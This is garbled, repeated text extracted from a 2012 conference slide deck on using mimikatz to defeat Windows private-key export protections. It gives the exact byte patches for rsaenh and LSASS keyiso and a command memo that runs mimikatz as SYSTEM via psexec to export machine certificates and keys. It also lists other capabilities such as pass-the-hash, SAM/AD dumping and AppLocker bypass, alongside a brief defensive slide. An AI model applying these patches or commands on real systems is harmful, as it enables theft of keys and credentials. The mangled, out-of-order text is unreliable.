Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
